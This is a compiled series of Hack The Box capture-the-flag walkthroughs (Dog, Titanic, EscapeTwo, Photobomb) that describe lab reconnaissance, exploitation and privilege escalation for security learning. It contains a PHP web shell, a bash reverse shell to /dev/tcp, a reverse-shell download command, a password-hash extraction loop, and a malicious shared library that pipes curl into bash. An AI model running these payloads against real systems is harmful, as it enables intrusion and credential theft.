Backdrop CMS is a robust, enterprise-level content management system built for creating and managing dynamic websites. Its deployment on the target system suggests a structured web application environment with multiple modules and components that could be misconfigured or vulnerable.

After accessing the CMS interface, I initially searched for a file upload mechanism to deploy a PHP reverse shell; however, I found no direct upload functionality.

Next, I navigated to the CMS dashboard and obtained the version information from the “Status Report” section within the Reports menu.

CVE-2024-41709: Stored XSS in Backdrop CMS via Unsanitized Field Labels

After conducting further analysis, I identified potential vulnerabilities in the CMS.

A stored Cross-Site Scripting (XSS) vulnerability, identified as CVE-2024-41709, affects Backdrop CMS versions before 1.27.3 and 1.28.x before 1.28.2. The vulnerability arises due to insufficient sanitisation of field labels, which are improperly escaped when rendered in certain parts of the CMS interface.

While exploitation requires the attacker to have the “administer fields” permission, it still poses a threat in multi-user environments or cases of misconfigured access control. Successful exploitation could lead to session hijacking, browser-based attacks, or privilege escalation.The issue has been fixed in Backdrop CMS 1.27.3 and 1.28.2. Users are strongly advised to upgrade to the latest version to mitigate this vulnerability and prevent potential compromise.

I came across an Exploit-DB entry (EDB-ID: 52021) by Ahmet Ümit BAYRAM, which details an authenticated remote command execution vulnerability affecting Backdrop CMS version 1.27.1—the same version identified on the Dog instance.

This script takes advantage of a security flaw in Backdrop CMS version 1.27.1. It’s designed for someone who already has login access with the right permissions (like an admin). The script quietly creates a fake “module” that looks harmless but contains a web shell—a small tool that lets an attacker run system commands through a web browser.

User Management Insights

This output appears to be from the user management section of a Backdrop CMS admin panel, listing all registered user accounts. Each entry includes the username, status, role, account age (member for), last modified, and last access times. All users have an Active status and the Administrator role, granting them full control over the CMS.

Notable accounts include tiffany, rosa, axel, john, and dogBackDropSystem. Most accounts show no access or updates for nearly a year, with tiffany as the only user with recent activity. Each account includes an Edit option to modify user details.

The presence of multiple inactive administrator accounts raises concerns about poor user management practices. Furthermore, dormant admin accounts heighten the risk of privilege escalation or brute-force attacks, particularly when passwords are weak or reused.

Crafting the Malicious Module

Here’s how it works:

First, it creates two files. One is shell.info, which tricks the system into thinking it’s a normal module. The second is shell.php, which has a small piece of code like this:

if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
}

That code lets the attacker enter any command in a browser and run it on the server. These files are zipped up as shell.zip.

The attacker then uploads this zip file through the CMS at /admin/modules/install. Once it’s in, they can visit /modules/shell/shell.php and take full control of the site.

Executing the Python script generates an output similar to the one shown above.

Details of shell.info

This file is named shell.info and is crafted to mimic a legitimate Backdrop CMS module. It contains metadata that describes the module, including its name (Block), description, package category (Layouts), version (1.27.1), and compatibility (backdrop = 1.x). The configure line tells the CMS where the module’s settings can be accessed in the admin panel. The project and timestamp fields are added automatically by Backdrop’s packaging system to make the module appear authentic. This file helps the fake module pass as legitimate during installation, which is key to exploiting the vulnerability.

Details of shell.php

The shell.php file is a simple web-based command execution tool known as a web shell. It creates a form in a browser that allows the user to input system commands.

When opened in a browser, it displays a text field and a submit button. If a command is entered (e.g., ls, whoami) and submitted this line:

system($_GET['cmd']);

executes that command on the server and shows the result on the page. This happens only if the URL includes ?cmd=your_command, such as:

/shell.php?cmd=whoami

It’s a powerful backdoor often used by attackers to gain control over a server after uploading it. In this case, it’s part of an exploit targeting Backdrop CMS.

Obtaining a Reverse Shell on Dog Machine

To obtain a reverse shell, you can use the well-known PHP reverse shell by Pentestmonkey. Download it using:

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/refs/heads/master/php-reverse-shell.php -O shell.php

Alternatively, use:

curl -o shell.php https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/refs/heads/master/php-reverse-shell.php

After downloading, edit shell.php and set your IP and port:

$ip = 'YOUR_ATTACKER_IP';
$port = 'YOUR_ATTACKER_PORT';

Packaging and Uploading the Module

This package was uploaded through the administrative interface by navigating to Functionality → Install Module → Manual Installation. Once the upload was completed, the malicious module was installed, paving the way for remote code execution through the embedded web shell.

To prepare the malicious module for upload, the folder containing the payload (e.g., shell/) must be archived into a .tar.gz file format. This is required because Backdrop CMS accepts .tar.gz packages for manual module installation.

Here’s how to create it:

tar -czf shell.tar.gz shell/

After uploading the .tar.gz file, the CMS extracted and deployed its contents, allowing the attacker to trigger the payload

The installation was completed successfully without any errors.

Establishing a Reverse Shell

The index appears as illustrated in the screenshot above.

The shell.php interface presents a simple form with a text input field for entering system commands, along with an “Execute” button to run them.

Command injection has been successfully achieved, allowing arbitrary system commands to be executed on the target server.

Let’s proceed by entering a bash reverse shell command into the input field of the shell.php interface. This will attempt to establish a connection back to your machine. Ensure you have a listener (like Netcat) running on your machine before executing the command.

Example reverse shell command (adjust IP and port accordingly):

bash -i >& /dev/tcp/10.10.14.99/4444 0>&1

The payload executed, but no connection was received.

We’ll modify the reverse shell command to use an alternative format.

Ultimately, the command executed successfully and produced the anticipated response.

Session Transition: www-data to johncusack within Dog Machine

While enumerating, I found a user account named johnsucack.

Using the same password from settings.php, I switched to this user

This grants access to the user flag with cat user.txt.

Escalate to Root Privileges Access on Dog Machine

Identifying Sudo Privileges

I checked for commands, the johnsucack user could run with elevated privileges:

The output revealed that johncusack could run /usr/local/bin/bee as root. After analyzing the binary, I found it accepted a root parameter to define a working directory, and an eval parameter to execute arbitrary code — basically, it was buzzing with privilege… and poor design choices

Understanding Bee: The CLI Tool for Backdrop CMS

Bee is a command-line utility tailored specifically for Backdrop CMS. It offers a suite of tools that help developers and administrators manage Backdrop sites more efficiently, directly from the terminal. Similar to Drush for Drupal, Bee streamlines repetitive administrative tasks.

Key capabilities of Bee include:

  • Running cron jobs to automate background processes
  • Clearing caches to apply configuration or content updates
  • Downloading and installing Backdrop core or contributed projects
  • Managing modules and themes (install, enable, disable)
  • Viewing system information like installed projects and status reports

In essence, Bee simplifies the management of Backdrop CMS, saving time and reducing reliance on the web interface for routine tasks. The source code is publicly available here:

The structured command set streamlines everyday tasks, enhances scripting possibilities, and supports robust site maintenance workflows from the command line.

Key Functional Areas:

  • Configuration: Handle export, import, and editing of configuration files.
  • Core & Projects: Install Backdrop, manage core updates, and enable/disable modules or themes.
  • Database: Drop, export, and import databases with ease.
  • Users & Roles: Create or manage user accounts, assign roles, and control permissions.
  • Cache & Maintenance: Clear caches and toggle maintenance mode for updates or debugging.
  • Cron & State: Run scheduled tasks and view or set internal state variables.
  • Advanced Utilities: Run PHP code (eval), execute scripts, or open SQL CLI sessions.

Exploiting the Bee Binary

The command sudo /usr/local/bin/bee --root=/var/www/html eval "system('id');" is used to execute a PHP system call through the Bee CLI tool under root privileges. In this case, the Bee binary is located at /usr/local/bin/bee, and the --root=/var/www/html flag specifies the path to the Backdrop CMS installation. The eval command tells Bee to evaluate the provided PHP code—specifically, system('id');—which runs the Linux id command and outputs the current user’s identity. Running this with sudo means the command is executed as the root user, so the output will likely return uid=0(root) along with group details, confirming root-level execution. This showcases how Bee can execute arbitrary system commands if misconfigured or granted excessive privileges, making it a potential target for post-exploitation during penetration testing or privilege escalation scenarios.

Retrieving the Root Flag

The command sudo /usr/local/bin/bee --root=/var/www/html eval "system('cat /root/root.txt');" retrieves the contents of the root.txt file, which typically serves as proof of root access in penetration testing platforms like Hack The Box. Running the command with sudo grants it root privileges. The Bee CLI tool, located at /usr/local/bin/bee, uses the eval argument to execute a PHP system() call that reads the root.txt file. The --root=/var/www/html flag tells Bee where to find the Backdrop CMS installation. If the command runs successfully, it prints the content of the root.txt file, confirming full system compromise. This approach shows how attackers can exploit misconfigured CLI tools like Bee, especially when administrators grant them root access, to execute arbitrary system commands and gain complete control.

Alternative Approach to Access the Root Flag

Even if the system doesn’t show special permissions on the bash program, it’s still possible to gain full control (root access) using a specific trick. Here’s what’s happening in simple terms:

We’re using a tool called Bee that administrators sometimes install to help manage websites. Normally, Bee is safe, but in this case, it’s being run with full system power (as the root user). By giving Bee a small instruction, telling it to open a command prompt (/bin/bash) using a special option (-p) — We can open a powerful backdoor. This option tells the system, “Don’t lower my power,” and because Bee already runs with full control, it allows us to keep that control.

So even though the bash tool doesn’t have special access on its own, using it through Bee (which does) lets us fully control the system. This shows how a trusted tool, if misused or poorly secured, can give attackers full access.

This grants access to the user flag with cat root.txt.

The post Hack The Box: Dog Machine Walkthrough (Easy Difficulty) appeared first on Threatninja.net.

Hack The Box: Titanic Machine Walkthrough – Easy Difficulty

✇Threatninja.net
By: darknite
Reading Time: 8 minutes

Introduction to Titanic

In this write-up, we will explore the Titanic machine from Hack The Box, categorised as an Easy difficulty challenge. This walkthrough will cover reconnaissance, exploitation, and privilege escalation steps required to capture the user and root flags.

Objective on Titanic

The goal of this walkthrough is to complete the Titanic machine from Hack The Box by achieving the following objectives:

User Flag

We obtained the user flag by exploiting a directory traversal vulnerability in the web application’s download endpoint. This allowed us to access the Gitea configuration file and database, from which we extracted and cracked the developer user’s password hash. Using the credentials, we gained SSH access as the developer user and retrieved the user.txt flag.

Root Flag

Privilege escalation to root involved exploiting a vulnerable ImageMagick version (CVE-2024-41817) in a script that processed files in a writable directory. By crafting a malicious shared library, we executed arbitrary commands to copy the root flag to a readable location. Additionally, we discovered the developer user had unrestricted sudo privileges, providing an alternative path to root access and the root.txt flag.

Enumerating the Machine

Reconnaissance: Nmap Scan

We begin by scanning the target to identify open ports and services using Nmap:

nmap -sSCV -p- --min-rate 10000 10.10.11.55 -oN nmap_initial.txt

Nmap Output:

┌─[dark@parrot]─[~/Documents/htb/titanic]
└──╼ $nmap -sC -sV -oA initial 10.10.11.55
# Nmap 7.94SVN scan initiated Wed Jun 18 11:46:00 2025 as: nmap -sC -sV -oA initial 10.10.11.55
Nmap scan report for 10.10.11.55
Host is up (0.18s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 73:03:9c:76:eb:04:f1:fe:c9:e9:80:44:9c:7f:13:46 (ECDSA)
|_  256 d5:bd:1d:5e:9a:86:1c:eb:88:63:4d:5f:88:4b:7e:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://titanic.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: titanic.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jun 18 11:46:33 2025 -- 1 IP address (1 host up) scanned in 33.24 seconds

Analysis:

  • 22/tcp (SSH): Potential foothold via credentialed access or post-exploitation pivot through OpenSSH 8.9p1.
  • 80/tcp (HTTP): Primary attack surface — Titanic Booking System web app may expose vulnerabilities for initial compromise.

Web Enumeration on Titanic Machine

Web Application Exploration

A screenshot of a website AI-generated content may be incorrect.

Visiting http://titanic.htb displays a booking form on the main page.

A screenshot of a computer AI-generated content may be incorrect.

Let’s proceed to book our trip using the form shown above.

A screenshot of a computer AI-generated content may be incorrect.

The screenshot above shows the request and response captured in Burp Suite.

A screenshot of a computer screen AI-generated content may be incorrect.

I noticed that in the previous response packet, there was a /download?ticket=*.json file, which provided information about the earlier booking

A screenshot of a computer screen AI-generated content may be incorrect.

Testing the endpoint revealed it is vulnerable to directory traversal, allowing access to sensitive files such as /etc/passwd

A screenshot of a computer AI-generated content may be incorrect.

We were also able to retrieve the user.txt file using this method.

A screenshot of a computer program AI-generated content may be incorrect.

We can also access the /etc/hosts file, which reveals an additional subdomain.

A screenshot of a computer program AI-generated content may be incorrect.

By exploiting the directory traversal vulnerability through the request
http://titanic.htb/download?ticket=../../../home/developer/gitea/data/gitea/conf/app.ini,
We successfully retrieved the Gitea configuration file (app.ini), which disclosed the path to the database located at /home/developer/gitea/data/gitea/gitea.db

A screenshot of a computer screen AI-generated content may be incorrect.

We located the database at the path revealed above

Let’s retrieve the database.

The hashes can be viewed in DB Browser for SQLite, where I found only two users with hashes stored.

sqlite3 gitea.db "select passwd,salt,name from user" | while read data; do
  digest=$(echo "$data" | cut -d'|' -f1 | xxd -r -p | base64)
  salt=$(echo "$data" | cut -d'|' -f2 | xxd -r -p | base64)
  name=$(echo "$data" | cut -d'|' -f3)
  echo "${name}:sha256:50000:${salt}:${digest}" >> gitea.hash
done

We extract and format them for cracking

Each line contains a scrambled version of a user’s password. The system uses a method called SHA256 and scrambles the password 50,000 times to make it tougher for anyone to guess. The hash format will resemble the example shown above.

To figure out the actual password, we use a tool named Hashcat. It tries lots of different passwords, scrambles them the same way, and checks if any match the scrambled version we have. When it finds a match, that means it has discovered the original password.

Understanding PBKDF2-SHA256: How Passwords Are Securely Protected

The cracked hash belongs to the developer account. The password is protected using something called PBKDF2-SHA256 with 50,000 rounds. That means the password is scrambled and mixed up 50,000 times to make it really hard for anyone to guess or crack it quickly. This process slows down attackers a lot, so even if they try many passwords, it takes a long time to check each one. It’s a way to keep passwords safe and secure.

After a period of processing, the hash was successfully cracked.

The successfully cracked hash corresponds to the developer account.

A computer screen with green text AI-generated content may be incorrect.

With the credentials, we establish an SSH connection

A computer screen with text AI-generated content may be incorrect.

We can retrieve the user flag by executing the command above.

Escalate to Root Privileges Access on Titanic Machine

Privilege Escalation

A screen shot of a computer program AI-generated content may be incorrect.

As a standard practice, we check for binaries with elevated privileges by running sudo -l. Sadly, we did not find any binaries with elevated privileges.

A screen shot of a computer AI-generated content may be incorrect.

Additionally, the process list (ps -ef) did not reveal any useful information.

A black background with blue and yellow text AI-generated content may be incorrect.

We proceed to enumerate the contents of the /opt directory.

A screen shot of a computer AI-generated content may be incorrect.

During system enumeration, we identified a script located at /opt/scripts/identify_images.sh that utilises ImageMagick to process files within /opt/app/static/assets/images/, a directory writable by the developer user. Verification of the ImageMagick version confirmed it is susceptible to CVE-2024-41817, a vulnerability that enables arbitrary code execution through malicious shared libraries.

CVE-2024-41817 Explained: How ImageMagick’s Flaw Enables Code Execution

CVE-2024-41817 is a critical vulnerability found in certain versions of ImageMagick, a widely used image processing software. This flaw allows attackers to execute arbitrary code on the system by tricking ImageMagick into loading malicious shared libraries during image processing. Exploiting this vulnerability can lead to full system compromise, especially if the software runs with elevated privileges or processes files in writable directories.

A computer screen with green and blue text AI-generated content may be incorrect.

The script identify_image.sh failed to write to metadata.log due to insufficient permissions (Permission denied on line 3).

I discovered that ImageMagick is installed on the target machine. ImageMagick is a free, open-source software suite widely used for editing and manipulating digital images. It enables users to create, edit, compose, or convert bitmap images and supports numerous file formats, including JPEG, PNG, GIF, TIFF, and Ultra HDR.

A computer screen with green text AI-generated content may be incorrect.

I identified that ImageMagick version 7.1.1-35 is installed on the machine. I researched known vulnerabilities for this specific version and discovered it is affected by CVE-2024-41817.

CVE-2024-41817 impacts ImageMagick — a free, open-source software suite for editing and manipulating digital images. The vulnerability arises in the AppImage version, where ImageMagick may use an empty path when setting the MAGICK_CONFIGURE_PATH and LD_LIBRARY_PATH environment variables during execution. This flaw can allow an attacker to execute arbitrary code by loading malicious configuration files or shared libraries from the current working directory.

A computer code with green text AI-generated content may be incorrect.

After some time, we crafted a bash reverse shell command.

A screenshot of a video AI-generated content may be incorrect.

After that, we started a listener to capture the incoming reverse shell connection.

A computer screen with green text AI-generated content may be incorrect.
gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void init(){
    system("curl <ip>/<file> | bash");
    exit(0);
}
EOF

We can invoke the file and execute it using bash.

A computer screen with text and numbers AI-generated content may be incorrect.

The Python server confirmed that the file transfer was successful.

A computer screen with green text AI-generated content may be incorrect.

The operation completed successfully.

A black background with colorful text AI-generated content may be incorrect.

We can retrieve the root flag by executing the command above.

The post Hack The Box: Titanic Machine Walkthrough – Easy Difficulty appeared first on Threatninja.net.

Hack The Box: EscapeTwo Machine Walkthrough – Easy Difficulty

✇Threatninja.net
By: darknite
Reading Time: 9 minutes

Introduction to EscapeTwo

This write-up will explore the “EscapeTwo” machine from Hack The Box, categorised as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.

Objective:

The goal of this walkthrough is to complete the “EscapeTwo” machine from Hack The Box by achieving the following objectives:

User Flag:

The attacker explored the target machine’s network services and exploited weak access controls. Initial scans identified open ports, including SMB, enabling access to shared folders. By reviewing these files, the attacker discovered a password and identified a user account (Ryan) with elevated permissions. Using these permissions, the attacker connected remotely to the system and retrieved the user flag with a simple command.

Root Flag:

First, the attacker escalated privileges by exploiting an Active Directory misconfiguration. Next, using the Ryan account, they employed tools to identify and modify permissions, thereby gaining control over a privileged account. With this control in hand, the attacker then acquired a special certificate, subsequently authenticated as an administrator, and finally retrieved the root flag with a command.

Enumerating the EscapeTWO Machine

Reconnaissance:

Nmap Scan:

Begin with a network scan to identify open ports and running services on the target machine. 

nmap -sC -sV -oN nmap_initial.txt 10.10.11.51

Nmap Output: 

┌─[dark@parrot]─[~/Documents/htb/escapetwo]
└──╼ $nmap -sC -sV -oA initial -Pn 10.10.11.51
Nmap scan report for 10.10.11.51
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-16 14:15:14Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-16T14:16:37+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2025-05-16T11:51:14
|_Not valid after:  2026-05-16T11:51:14
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2025-05-16T11:51:14
|_Not valid after:  2026-05-16T11:51:14
|_ssl-date: 2025-05-16T14:16:37+00:00; 0s from scanner time.
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.10.11.51:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-05-16T04:02:09
|_Not valid after:  2055-05-16T04:02:09
|_ssl-date: 2025-05-16T14:16:37+00:00; 0s from scanner time.
| ms-sql-ntlm-info: 
|   10.10.11.51:1433: 
|     Target_Name: SEQUEL
|     NetBIOS_Domain_Name: SEQUEL
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: DC01.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-16T14:16:37+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2025-05-16T11:51:14
|_Not valid after:  2026-05-16T11:51:14
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2025-05-16T11:51:14
|_Not valid after:  2026-05-16T11:51:14
|_ssl-date: 2025-05-16T14:16:37+00:00; 0s from scanner time.

Analysis:

  • 53/tcp (domain): Simple DNS Plus server running, likely handling DNS requests.
  • 88/tcp (kerberos-sec): Kerberos authentication service active, indicates Active Directory environment.
  • 135/tcp (msrpc): Microsoft RPC service, used for remote procedure calls on Windows.
  • 139/tcp (netbios-ssn): NetBIOS session service, Windows file and printer sharing over SMBv1.
  • 389/tcp (ldap): LDAP service for Active Directory directory services (non-SSL).
  • 445/tcp (microsoft-ds): SMB service used for Windows file sharing and Active Directory.
  • 464/tcp (kpasswd5): Kerberos password change service.
  • 593/tcp (ncacn_http): Microsoft RPC over HTTP, potentially used for remote management.
  • 636/tcp (ssl/ldap): Secure LDAP (LDAPS) for encrypted directory access.
  • 1433/tcp (ms-sql-s): Microsoft SQL Server 2019 instance accessible, possibly exploitable.
  • 3268/tcp (ldap): Global Catalog LDAP for Active Directory, supports forest-wide queries.
  • 3269/tcp (ssl/ldap): Secure Global Catalog LDAP over SSL.

Exploitation

Samba Exploration:

If successful, it then attempts to find other user accounts by brute-forcing their ID numbers, thereby helping to identify valid users for further testing.

The output is then filtered using grep SidTypeUser Only the entries that correspond to actual user accounts will be displayed, excluding groups or system accounts. This helps the tester quickly identify valid user accounts on the target machine for further analysis or access attempts.v

It connects to the target machine at the IP address 10.10.11.51 with the smbclient tool, a command-line utility similar to an FTP client but designed for accessing SMB shares.

This list shows shared folders on a computer that others on the network can access, like shared drawers in an office.

  • Accounting Department: Likely holds financial or work files for the accounting team.
  • ADMIN$ and C$: Hidden folders for IT admins to manage the system remotely.
  • IPC$: A system tool for communication between devices, not a regular folder.
  • NETLOGON and SYSVOL: Support user login and access control in the network.
  • Users: Contains personal folders for different computer users.

The folder contains two Excel files: accounting_2024.xlsx and accounts.xlsx.

Transferring both files to our computer

We discovered a password stored within an XML file.

It looks much cleaner when using the Python command.

SQL enumeration on EscapeTwo machine

Since the Nmap results indicated that the MSSQL service is open, and the default MSSQL user (sa) Typically has the highest level of administrative privileges, so it’s worth attempting to use it. In this case, we try to enable and use the xp_cmdshell feature for further exploitation.

Let’s proceed with executing MSSQL commands.

Let’s initiate our listener.

The operation was successful, so we proceeded to enable xp_cmdshell and execute the shell command through it to confirm execution.

We established a reverse shell connection.

The SQL Server 2019 installation was found.

Begin by enumerating the local files, where you will find a configuration file located at C:\SQL2019\ExpressAdv_ENU.

Another password was found in the configuration file named sql-Configuration.INI.

Discovered several potential usernames.

SMB access was obtained as the user Ryan, which can be used for enumeration with BloodHound.

Bloodhound enumeration on escapetwo machine

We will gather additional information using BloodHound.

Once the collection was complete, I imported them into BloodHound. That’s when I found the ryan with CA_SVC account — one I could change the owner of.

Let’s examine Oscar’s connection.

We can see that Ryan has the WriteOwner permission on the CA_SVC account.

Using NXC, we were able to discover credentials that work with WinRM

We can read the user flag by typing “type user.txt’ command

Escalate to Root Privileges Access

Privilege Escalation:

We attempted to use the owneredit.py Script to change the object ownership, but the operation failed due to an unspecified issue.

The script executed successfully after setting PYTHONPATH=… For instance, assigning ownership of an administrator account to a user like Ryan would mean he could modify settings or permissions that are normally reserved for administrators. Moreover, this change could increase Ryan’s control over the system. Therefore, it is important to carefully manage account ownership to prevent unauthorized access.

This command is used in dacledit.py to grant the user Ryan full control (FullControl) permissions over the ca_svc account. It authenticates to the domain sequel.htb using Ryan’s credentials. The -action 'write' flag specifies that a permission change is being made.

This command allows the user Ryan to quietly gain access as another account, ca_svc, by taking advantage of a weakness in how the network handles certificates.

It uses a special code (hash) instead of a password to access the account and looks for any vulnerable settings, then shows the results on the screen.

This command uses Certipy to request a special security certificate from the network’s main server (dc01.sequel.htb) using a template named DunderMifflinAuthentication.

This command requests a certificate from the sequel-DC01-CA on the domain controller DC01.sequel.htb. It uses the ca_svc account’s NT hash for authentication and asks for a certificate based on the DunderMifflinAuthentication template.

This command uses Certipy to authenticate to the domain controller at IP 10.10.11.51 using the certificate file administrator.pfx.

We read the root flag by typing the “type root.txt” command

The post Hack The Box: EscapeTwo Machine Walkthrough – Easy Difficulty appeared first on Threatninja.net.

Hack The Box: Photobomb Machine Walkthrough – Easy Difficulty

✇Threatninja.net
By: darknite

In this post, I would like to share a walkthrough of the Photobomb Machine from Hack the Box

This room will be considered an Easy machine on Hack the Box

What will you gain from the PhotoBomb machine?

For the user flag, you will need to find credentials which saved inside a JavaScript file. It will allow the bad guy to obtain access to an image manipulation panel where you will be able to execute command injection vulnerability within the panel. As a result, we will be able to retrieve a reverse shell from the attack

As for the root flag, you need to take advantage of a script that can be executed as root privileges which it can use with the path hijacking method. It will lead us to retrieve a root flag that way

Information Gathering on Photobomb Machine

Once we have started the VPN connection which requires a download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -P

Let’s access the website interface

Graphical user interface, text Description automatically generated

Sadly, the website URL has redirected to a valid domain

Enumerate on the website interface

At last, we managed to access the valid domain, and nothing can be found over here except the link that we can press to analyze the link.

However, we are required to enter the credential to proceed

Let’s review the source code for the website nothing looks suspicious but there’s a JavaScript link

Text Description automatically generated

Oh wow! We managed to retrieve some credentials over here.

Graphical user interface, application Description automatically generated

As a result, we can access it by key-in the credentials that we found earlier.

Finally, we managed to access the printer directory

Let’s download the picture with the larger size on our attacker’s machine

Text Description automatically generated

The response looks something fishy over here

Text Description automatically generated

When trying some command injection after the filetype png/jpg, we managed to see an error saying “Failed to generate a copy of <Filename>”

Graphical user interface, text Description automatically generated

Therefore, let’s insert some reverse shell which I take it from here and try to encode it. After a while, the response didn’t reply at all.

Text Description automatically generated

However, the reverse shell connection has come back to us.

Text Description automatically generated

We can read the user flag by typing “cat user.txt”

Escalate to Root Privileges Access

A screenshot of a computer Description automatically generated with medium confidence

We should be enumerated manually by running the “sudo -l” command

Text Description automatically generated

The screenshot above shows the code that resides inside the /opt/cleanup.sh file

Graphical user interface Description automatically generated

Let’s create some script that will try to escalate to root privileges access

Once completed with the script, let’s compile it as shown above.

A picture containing text Description automatically generated

As a result, let’s upload the compiled script into the victim’s machine

Let’s run the command above to obtain a root shell

A screenshot of a computer Description automatically generated with low confidence
A screenshot of a computer Description automatically generated with low confidence

We can read the root flag by running the “cat root.txt” command

Extra Information

A picture containing text, dark Description automatically generated

The post Hack The Box: Photobomb Machine Walkthrough – Easy Difficulty appeared first on Threatninja.net.

❌